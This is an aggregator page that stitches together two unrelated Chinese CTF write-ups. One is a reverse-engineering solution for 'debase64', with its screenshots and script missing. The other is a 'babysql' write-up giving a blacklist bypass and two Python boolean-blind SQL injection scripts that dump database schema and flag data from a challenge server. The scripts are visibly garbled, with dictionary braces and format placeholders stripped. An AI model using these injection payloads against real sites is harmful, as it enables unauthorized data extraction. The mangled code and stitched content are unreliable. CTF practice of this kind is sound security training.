NSSCTF逆向2023题目《debase64》

Posted Corax0o0

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NSSCTF逆向2023题目《debase64》相关的知识,希望对你有一定的参考价值。

总览

debase64 变种base64解密

题目debase64

解法

这道题是有点抽象的。
首先打开看看是啥东西

输入什么东西都不给回显
那打开exeinfo看看

无壳32 放ida看看吧

main函数就是长这个样子
最关键的就是这个

应该就是这个解码的函数,传入了我们输入的v15 打开看看

里面长这个样子,通过移位可以依稀看到一些base64的痕迹。
仔细分析一下 上面那坨代码大概就是赋四个值。
这个时候我脑子有点没转过来 才发现这个是debase64也就是解密
所以我们输入的就是base64之后的秘闻 所以是四个组成三个字符
这样一看四个 也能理解了。
但是下面这一坨

说实话跟普通的base64是不一样的,我也有点看懵逼
看看别人的wp,这个地方意思就是 逆序处理base64,意思就是按照逆向处理的字符是四个一组反着来的

ok
现在的逆向思路就是把里面的这个

按照base64加密出来人,然后手动解开,但是要注意后面几位是0 也就是我们还需要自己爆破 来和题目给的md5值比较。
脚本如下

解出来的就是这样
Ru0Yllae0nKys4Bw/w
Y0uReallyKn0wB4s/w==
里面的/w是错的 最后三个是等号
Y0uReallyKn0wB4s?===
爆破出来

flag Y0uReallyKn0wB4s3===

[NSSCTF 2022 Spring Recruit]babysql

https://www.ctfer.vip/problem/2075


根据输入框的提示传入tarnish返回如下


简单测试下发现黑名单:hacker!!black_list is /if|and|\\s|#|--/i

把注释符号都过滤了,可以使用闭合的方法构造注入,空格使用/**/绕过

这里采用同或(!=!)来构造注入

同或 !=! 的逻辑:
1 !=! 1 == 1
1 !=! 0 == 0
0 !=! 1 == 0
0 !=! 0 == 1
mysql> select 1 !=! 0 !=! 1;
+---------------+
| 1 !=! 0 !=! 1 |
+---------------+
|             0 |
+---------------+
1 row in set (0.01 sec)

mysql> select 1 !=! 1 !=! 1;
+---------------+
| 1 !=! 1 !=! 1 |
+---------------+
|             1 |
+---------------+
1 row in set (0.00 sec)

mysql> select * from users where uid=1;
+-----+----------+----------+
| uid | username | password |
+-----+----------+----------+
|   1 | admin    | admin    |
+-----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where uid=1 !=! 0 !=! 1;
+-----+---------------+----------------------------------+
| uid | username      | password                         |
+-----+---------------+----------------------------------+
|   2 | mochu7        | mochu7                           |
|   3 | flag          | flagThe_Sql_F14g_0f_mochu7     |
|   0 | Administrator | 874a0300d72a3676c4413ce52454eff7 |
|   4 | testuser      | 123456                           |
+-----+---------------+----------------------------------+
4 rows in set (0.00 sec)

mysql> select * from users where uid=1 !=! 1 !=! 1;
+-----+----------+----------+
| uid | username | password |
+-----+----------+----------+
|   1 | admin    | admin    |
+-----+----------+----------+
1 row in set (0.00 sec)
username=tarnish'!=!(1)!=!'1  (True !=! True !=! True) == True
username=tarnish'!=!(0)!=!'1  (True !=! False !=! True) == False



布尔盲注,脚本跑

import requests

asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`|~'
burp0_url = "http://1.14.71.254:28085/"
burp0_headers = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0", 
				 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
				 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 
				 "Accept-Encoding": "gzip, deflate", 
				 "Content-Type": "application/x-www-form-urlencoded"
				 
content = ''
for i in range(1, 100):
	for s in asc_str:
		# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),,1))=)/**/!=!/**/'1".format(i, ord(s))
		# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),,1))=)/**/!=!/**/'1".format(i, ord(s))
		# payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),,1))=)/**/!=!/**/'1".format(i, ord(s))
		payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),,1))=)/**/!=!/**/'1".format(i, ord(s))	
		burp0_data = "username": payload
		resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
		if 'string(39)' in resp.text:
			content += s
			print(content)

最笨的办法,比较慢,需要多等一会,追求效率可以使用二分法。

二分法

import requests

asc_str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`|~'
burp0_url = "http://1.14.71.254:28758/"
burp0_headers = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0", 
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 
                 "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 
                 "Accept-Encoding": "gzip, deflate", 
                 "Content-Type": "application/x-www-form-urlencoded"
                 
content = ''

for pos in range(1, 100):
    min_num = 32
    max_num = 126
    mid_num = (min_num + max_num) // 2
    while(min_num < max_num):
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test'),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        # payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        payload = "tarnish'/**/!=!/**/(ascii(mid((select/**/group_concat(flag)/**/from/**/test.flag),,1))>)/**/!=!/**/'1".format(pos, mid_num)
        burp0_data = "username": payload
        resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if 'string(39)' in resp.text:
            min_num = mid_num + 1
        else:
            max_num = mid_num
        mid_num = (min_num + max_num) // 2
    content += chr(min_num)
    print(content)

以上是关于NSSCTF逆向2023题目《debase64》的主要内容,如果未能解决你的问题,请参考以下文章

NSSCTF逆向2023题目《doublegame》《fake_game》《easy_pyc》《For Aiur》

NSSCTF逆向2023题目《程序和人有一个能跑就行了》《encode》

[NSSCTF 2022 Spring Recruit]babysql

[NSSCTF 2022 Spring Recruit]babysql

[逆向]0ctf2015-slimming

ISCC 2016 逆向部分 writeup